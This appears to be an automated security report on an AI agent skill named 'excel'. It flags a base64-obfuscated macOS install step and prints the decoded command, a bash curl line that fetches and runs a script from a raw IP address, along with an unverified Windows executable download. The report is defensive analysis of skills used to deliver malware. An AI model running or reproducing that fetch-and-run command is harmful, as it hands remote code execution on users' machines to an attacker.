Trust Assessment
excel received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Obfuscated Remote Code Execution via Base64-encoded Shell Command", and "Direct Download and Execution of Untrusted Executable".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell.** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/moonshine-100rze/excel-1kl/SKILL.md:12 |
| CRITICAL | **Obfuscated Remote Code Execution via Base64-encoded Shell Command.** The skill's prerequisites for macOS instruct the user to copy and run a base64-encoded shell command. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)"`, which downloads and executes an arbitrary script from an external, untrusted IP address (`91.92.242.30`) directly into the user's shell. This allows for immediate remote code execution with the privileges of the user running the command, posing an extreme security risk. The use of base64 encoding attempts to obscure the malicious nature of the command, also constituting a hidden instruction. Remove the instruction to execute arbitrary shell commands, especially those involving remote script execution from untrusted sources. Provide a secure, verifiable installation method, such as a package manager or a signed installer. | LLM | SKILL.md:16 |
| HIGH | **Direct Download and Execution of Untrusted Executable.** The skill's prerequisites for Windows instruct the user to download a `.zip` file containing an executable (`openclawcore-1.0.3.zip`) from a GitHub release and run it. While GitHub is a common platform, downloading and executing arbitrary binaries from a skill description without further verification (e.g., code signing, checksums) introduces a significant supply chain risk. A compromised GitHub account or release could lead to the distribution of malware. The skill implicitly relies on the user to execute this untrusted code, which then becomes the backend for the skill's operations, effectively enabling command injection if the `openclaw-core` utility itself has vulnerabilities or can be manipulated by skill inputs. Provide a more secure installation method, such as a signed installer, a package manager, or clear instructions for verifying the integrity of the downloaded executable (e.g., SHA256 checksums). Avoid instructing users to directly download and run executables from arbitrary URLs. | LLM | SKILL.md:13 |
| MEDIUM | **Broad Local File System Access.** The skill is designed to interact extensively with the local file system, accepting `filePath` and `outputPath` parameters for various actions (e.g., `readSheet`, `writeData`, `exportCsv`). This grants the underlying `openclaw-core` utility (and by extension, the skill) broad read/write access to potentially any file on the user's system, limited only by the permissions of the process running `openclaw-core`. While necessary for its functionality, this broad access, especially when combined with the untrusted nature of the `openclaw-core` installation (as identified in other findings), creates a significant attack surface for data exfiltration or unauthorized file modification if the skill's inputs can be manipulated. Implement strict input validation and sanitization for all file paths. Consider sandboxing the `openclaw-core` utility or restricting its file system access to specific, user-designated directories. Clearly communicate the file system access requirements and potential risks to the user. | LLM | SKILL.md:35 |